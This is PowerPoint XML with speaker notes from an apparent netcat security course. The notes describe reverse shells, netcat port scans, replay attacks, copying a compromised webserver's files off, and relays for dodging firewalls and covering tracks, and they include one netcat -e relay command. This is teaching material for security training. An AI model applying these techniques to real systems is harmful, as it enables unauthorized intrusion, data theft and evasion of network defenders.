        <a:ext cx="1725008" cy="44343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FA9E573-826D-AE4F-BBC0-1BB0292E201A}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>12/11/2014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5FCE54-3DC1-B643-BE44-570AB775C13D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3913926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9DECF4-30E9-466A-B109-8762C7F5B80A}" type="datetimeFigureOut">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>12/11/2014</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FA2683-1823-497E-A4E2-A8D913D4171F}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="865553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IE" sz="1100" baseline="0"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4CB9597-2D62-4795-86F8-154E793B55BD}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-I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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The shell we showed in the previous slide is actually of limited use apart from when you are going from machine to machine on a LAN. The reason for that is simple – Firewalls. Any firewall between the client and the listening netcat listener is highly likely to block all incoming traffic, so the request will never make it through.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So it is much more common to “shovel a shell” back to the attacker, i.e. A Reverse shell. In other words in this case you run a netcat listener on the ATTACKERS machine, and have the victim machine connect out to it – executing a shell on a successful connection. This has a much greater chance of getting through a firewall as it is an outbound request, and even more chance if the attackers listener is on port 80 or 443.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Ok – time to try these netcat basics yourselves!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Ok – so we’ve looked at the the most basic ways of using Netcat – now we’ll look at some more interesting example from an attackers point of view. You are not expected to memorise all of these, but just being aware they exist – and having the notes will help a lot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>First up a port scanner. Its nowhere near as good as nmap, but will do if netcat is all you have to work with.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-v : Ensures that you find out if the port was open or not (prints out connection success / fail)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-r: Randomises the order of the ports (optional – not present in all versions of netcat e.g. The Kali version)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-w3: Wait 3 seconds for a response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>-z: Zero I/O – in other words don’t sent any data, just connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>This first example is a TCP scanner, add –u for a UDP one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>By adding the echo in front you send a single space once the connection is established, which in a lot of cases will make the server respond with a header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>You can also make this into a vulnerability scanner of sorts – with a bit of duct taping of a scripting language around it, or even just piping/redirecting in a file.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Netcat can also be used for a simple replay attack. Simply capture the traffic with a sniffer in raw format (no headers), or from redirecting the traffic to a netcat listener in the first place (e.g. Add an entry for the apps domain in the /etc/hosts). Then you can modify it if needed and use netcat to send it on its merry way</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Another handy use of Netcat is a quick one shot webserver. An attacker could use this for phishing /exploit purposes, or its also just handy if you need to spin up a simple webserver serving a basic HTML or PHP page. You can also wrap a while loop around it to make it more persistant</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Two more examples before we get onto the most important example of all – firstly, imagine you have just taken over a webserver. Now as the attacker you might want to copy all the files of the webserver to look through them for interesting information. Doing that one by one is going to be REALLY tedious. So here is a simple trick to take an entire directory, tar and zip it and unzip it on the other side. The bzip is optional here – tar will work on its own, it just adds some compression.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Heres another neat example. Imagine you had just booted up a machine from an OS on a USB and want to clone that setup to another machine. You can do that with Netcat and dd. Obviously you need to change /dev/sda here to the name of your own drive.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Hopefully this chaining of commands and Netcat start to give some idea of the power of the tools when you really put your mind to it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Lets take a look at one other very useful use case for Netcat before moving onto a final exercise on this tool – Relays.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Netcat can be configured to relay information from machine to machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Take a look at whats going on in the example, at the middle machine in particular – and wrap your brain around how STDOUT / STDIN of the various Netcats is connected up. In fact if you ever get confused by a netcat setup, sketching out the various netcat instances and connecting the relevant STDIN and STDOUT is a great way to get a clearer picture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>So what happens here on the relay – its really trivial . One instance of netcat listens on a port, and then pipes its output through another client mode of netcat. You can chain as many of these as you like together.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Think fo these like Jigsaw pieces – with the “outie” (STDOUT) connecting to the “innie” (STDIN) of the next piece.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Relay chains like this prove very useful for getting around Firewall filters, or for just covering your tracks. You can also use them as a form of port forwarding on a local machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>There is one main draw back to the setup on the slide – any ideas what it is? This set is one directional only. You can send things from Machine 1 to Machine 2, but anything entered on STDIN on machine 2 only makes it as far as the relay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>To make a 2 way netcat relay there are 4 main ways to do this...</a:t>
            </a:r>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0"/>
              <a:t>The first approach involves using 3 netcats on the Relay Machine. The first listens for connections from an incoming machine. An data from that connection is passed onto the next hop AND any information coming back from that next hop is in turn relayed back to the original machine. This approach is pretty sloppy however – the return traffic comes back on a different port than it was sent on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>The second approach works on Windows. We first create a batch file that simply creates a netcat client connection to the next hop. We then create a listener that will invoke this bat file using command execution redirection as we did before with shells. Pause for a minute and picture or sketch out how the STDOUT / STDIN connections work here.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>STDOUT of the Netcat Listener is connected to STDIN of the Netcat client in the batch file, and makes its way to the next_hop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Anything coming back from next_hop in turn is connected to STDIN of the Netcat listener – which will be sent back to the original machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>In case you are wondering why we could not simply do:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>nc –lp 11111 –e nc next_hop 22222</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>The reason is that the –e options of Netcat only allows a single parameter after it</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>A 3rd way, which is very popular on Unix systems is the following. This will bind netcat to TCP port 11111 and forward anything it recieves to the next hop. Many people use this approach, but any modifications to a file like inetd.conf should be noticed by a good network admin pretty quickly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>So that leaves us with our final approach, which is the advised way to setup a Netcat relay on Unix systems. Lets put the command up here first and then step through it in a diagram to be sure everyone gets it. Have a look over it for a second – especially those less familiar with Unix.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>The first command use the mknod command to make a file called backpipe of a special file type known as a FIFO. The second command connects things up to allow all the STDOUT and STDIN work in a way to allow for a 2 directional relay to work.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Lets sketch it out to see what is going on here.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IE"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9600" y="152400"/>
            <a:ext cx="5502275" cy="4127500"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Our first command make this special Backpipe file which acts as a FIFO – think of it as a pipe that you can drop data through.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>Now lets look at the more complex 2nd command – starting with the parts highlighted in red. This simply sets up a Netcat listener on the client machine, and a netcat client.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
              <a:sym typeface="Wingdings"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ga-IE" baseline="0" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>NOTE: The colour highlighted text here does not refer to the image you enter the text on, its only to show the parts of the text I am talking about! All of this is inputed on the machine you are setting up as a relay.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ED08DB6E-F7AE-42AB-BB6A-322F1BCCEC84}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-I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94CB9597-2D62-4795-86F8-154E793B55BD}" type="slidenum">
              <a:rPr lang="en-IE" smtClean="0"/>
              <a:pPr/>
